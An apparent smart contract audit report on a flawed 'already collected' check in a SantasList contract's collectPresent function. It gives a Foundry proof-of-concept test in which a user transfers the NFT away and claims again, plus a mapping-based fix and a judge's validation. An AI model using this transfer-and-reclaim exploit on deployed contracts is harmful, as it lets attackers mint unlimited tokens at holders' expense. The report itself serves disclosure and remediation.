Submission Details
Severity: high
Valid

Users can mint an unlimited number of tokens and NFTs

Summary

There are vulnerabilities in collectPresent that allow users to mint as many tokens and NFTs as they desire.

Vulnerability Details

The issue lies in the following code snippet within the collectPresent function:

    if (balanceOf(msg.sender) > 0) {
        revert SantasList__AlreadyCollected();
    }

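This way of determining whether a user has already collected their reward is flawed. The check reads the caller's current NFT balance, so a user can transfer the NFT to another address, which brings their balance back to zero, and then call collectPresent again. Nothing stops them from repeating this, so collectPresent can be invoked multiple times.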

Impact

Users can exploit this vulnerability to mint an unlimited number of NFTs (and tokens, if the user is EXTRA_NICE).

POC

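    function testTransferNFTAndMintAgain() external {
        // Santa marks the user as EXTRA_NICE in both passes of the list
        vm.startPrank(santa);
        santasList.checkList(user, SantasList.Status.EXTRA_NICE);
        santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);
        vm.stopPrank();

        // Move past the Christmas 2023 timestamp so presents can be collected
        vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

        vm.startPrank(user);
        // First claim mints NFT 0; transferring it resets the user's balance to 0
        santasList.collectPresent();
        santasList.transferFrom(user, user2, 0);
        // The balanceOf check passes again, so a second claim mints NFT 1
        santasList.collectPresent();
        santasList.transferFrom(user, user2, 1);
        vm.stopPrank();

        address ownerNFT0 = santasList.ownerOf(0);
        address ownerNFT1 = santasList.ownerOf(1);
        uint256 userBalance = santaToken.balanceOf(user);

        // Both NFTs ended up with user2, and the user received tokens twice
        assertEq(ownerNFT0, user2);
        assertEq(ownerNFT1, user2);
        assertEq(userBalance, 2e18);
    }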

Tools Used

Foundry

Recommendations

Store the user claiming the reward in a mapping to ensure that they can only collect the reward once.
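
The recommended mapping, shown next to the weak balance check, as an added example that is not the audited contract's code. It uses a minimal stand-in ledger with eligibility and time checks omitted; hasCollected, PresentClaimSketch, NotTokenOwner, nextTokenId and the Weak/Fixed function suffixes are hypothetical names.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration: a minimal stand-in ledger, not the audited SantasList contract.
// Eligibility and time checks are omitted; every name except balanceOf, ownerOf,
// transferFrom and SantasList__AlreadyCollected is hypothetical.
contract PresentClaimSketch {
    error SantasList__AlreadyCollected();
    error NotTokenOwner();

    mapping(uint256 => address) public ownerOf;
    mapping(address => uint256) public balanceOf;
    // The fix: claim state keyed by address, which a transfer cannot reset.
    mapping(address => bool) public hasCollected;
    uint256 private nextTokenId;

    function transferFrom(address from, address to, uint256 tokenId) external {
        if (ownerOf[tokenId] != from || msg.sender != from) revert NotTokenOwner();
        ownerOf[tokenId] = to;
        balanceOf[from] -= 1;
        balanceOf[to] += 1;
    }

    // Weak check from the finding: the balance returns to zero after a
    // transfer, so the same address passes the check again.
    function collectPresentWeak() external {
        if (balanceOf[msg.sender] > 0) revert SantasList__AlreadyCollected();
        _mint(msg.sender);
    }

    // Hardened check: the claim is recorded before minting, and it stays
    // recorded no matter where the NFT goes afterwards.
    function collectPresentFixed() external {
        if (hasCollected[msg.sender]) revert SantasList__AlreadyCollected();
        hasCollected[msg.sender] = true;
        _mint(msg.sender);
    }

    function _mint(address to) private {
        uint256 tokenId = nextTokenId++;
        ownerOf[tokenId] = to;
        balanceOf[to] += 1;
    }
}
```

Running the POC sequence against collectPresentFixed makes the second call revert with SantasList__AlreadyCollected, which is the assertion a regression test for the fix should make.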

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.
